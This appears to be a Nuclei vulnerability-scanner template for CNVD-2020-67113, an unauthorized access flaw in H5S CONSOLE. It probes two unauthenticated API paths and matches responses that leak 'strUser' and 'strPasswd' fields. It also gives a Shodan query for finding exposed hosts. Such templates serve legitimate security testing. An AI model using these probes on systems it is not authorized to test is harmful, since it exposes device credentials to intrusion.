id: CNVD-2020-67113

info:
  name: H5S CONSOLE - Unauthorized Access
  author: ritikchaddha
  severity: medium
  description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.
  reference:
    - https://vul.wangan.com/a/CNVD-2020-67113
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-425
  metadata:
    verified: true
    shodan-query: http.title:"H5S CONSOLE"
  tags: cnvd,cnvd2020,h5s,unauth,h5sconsole

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/GetSrc"
      - "{{BaseURL}}/api/v1/GetDevice"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'strUser'
          - 'strPasswd'
        condition: and

      - type: word
        part: body
        words:
          - 'H5_AUTO'
          - 'H5_DEV'
        condition: or

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/06